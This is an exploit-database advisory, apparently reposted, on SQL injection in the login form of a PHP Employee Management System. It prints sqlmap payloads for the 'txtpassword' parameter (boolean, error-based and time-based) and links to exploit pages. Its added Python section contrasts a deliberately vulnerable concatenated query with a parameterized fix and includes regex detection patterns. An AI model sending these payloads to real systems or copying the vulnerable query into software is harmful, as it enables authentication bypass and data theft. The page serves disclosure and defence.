employee_akpoly-1.0-2024 Multiple-SQLi

CVE: CVE-XXXX-XXXX
Category: CWE-XX
Price: Price not available
Severity: High
Author: Not specified
Risk: Critical
Exploitation Type: Remote
Date: 2024-03-01
CVSS: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030002

Below is a copy:

## Title: employee_akpoly-1.0-2024 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/01/2024
## Vendor: https://www.sourcecodester.com/users/walterjnr1
## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
Potential SQLi detected in the password parameter. Please confirm it manually. The payload from the puncher_SQLi_bypass_authentication module was submitted successfully after the test. You must test manually to confirm this vulnerability! By using this vulnerability, an attacker can take control of an admin account, and even worse.

STATUS: HIGH - Vulnerability

[+]Payload (sqlmap output):
```text
---
Parameter: txtpassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT 2215=2215# TKHd&btnlogin=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT 2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT 3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=
---
```
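The sqlmap output above shows a boolean-based blind oracle on `txtpassword`: the printed payload (`OR NOT 2215=2215`) is the false branch, and sqlmap proves injection by pairing it with a true branch that changes the response. The block below is an added example, not code from the advisory or from the Employee Management System itself. It uses an in-memory SQLite table as a constructed stand-in for the application's unknown `users` schema, swaps MySQL's `#` comment for SQLite's `-- ` (also a constructed adaptation), and shows the two things a maintainer would want: the string-built login query that leaks the oracle (and hands over the admin row on the true branch) next to the parameterized query that treats the same input as plain data, plus a request-side check that flags the three payload families sqlmap reported (tautology, `FLOOR(RAND())` error trick, `SLEEP` delay) for logging or blocking before the query runs.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the app's users table; the real schema is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, "
        "password TEXT NOT NULL, role TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery', 'admin')")
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """Vulnerable pattern: form fields spliced into SQL text (the defect class reported)."""
    sql = (
        "SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a broken query looks like a failed login, which is what blind SQLi probes


def login_parameterized(conn, username, password):
    """Fixed pattern: placeholders, so the driver never interprets input as SQL."""
    sql = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# The advisory's boolean payload, adapted to SQLite comment syntax (constructed).
USERNAME = "WKFNZjdP"
PAYLOAD_FALSE = "y6Q!i4e!W6' OR NOT 2215=2215-- TKHd"  # NOT(true): no extra rows
PAYLOAD_TRUE = "y6Q!i4e!W6' OR NOT 2215=2216-- TKHd"   # NOT(false): every row matches


def oracle(login):
    """Return (false_branch_logged_in, true_branch_logged_in) for a login function."""
    conn = make_db()
    return (
        login(conn, USERNAME, PAYLOAD_FALSE) is not None,
        login(conn, USERNAME, PAYLOAD_TRUE) is not None,
    )


# Defence in depth: signatures for the three families in the sqlmap report, applied to the
# URL-decoded field value. This is a logging/alerting aid, not a substitute for placeholders.
INJECTION_PATTERNS = [
    re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),  # tautology / boolean blind
    re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),                     # FLOOR(RAND()) error-based
    re.compile(r"SLEEP\s*\(\s*\d+\s*\)", re.I),                      # time-based delay
]


def looks_injected(value: str) -> bool:
    """True if a login field value carries one of the reported payload signatures."""
    return any(p.search(value) for p in INJECTION_PATTERNS)


if __name__ == "__main__":
    print("concatenated :", oracle(login_concatenated))   # (False, True): oracle leaks, admin row on true branch
    print("parameterized:", oracle(login_parameterized))  # (False, False): input stays data
    print("flagged      :", looks_injected(PAYLOAD_TRUE))  # True
```

The `(False, True)` result from the concatenated version is exactly the differential sqlmap relies on; with placeholders both branches return no row, because `WKFNZjdP` is simply not a user. The regex check is intentionally narrow (it matches the payload shapes on this page) so it can be wired into request logging without false-positive noise on ordinary passwords.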

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024

## Proof and Exploit:
https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html

## Time spent:
00:35:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.
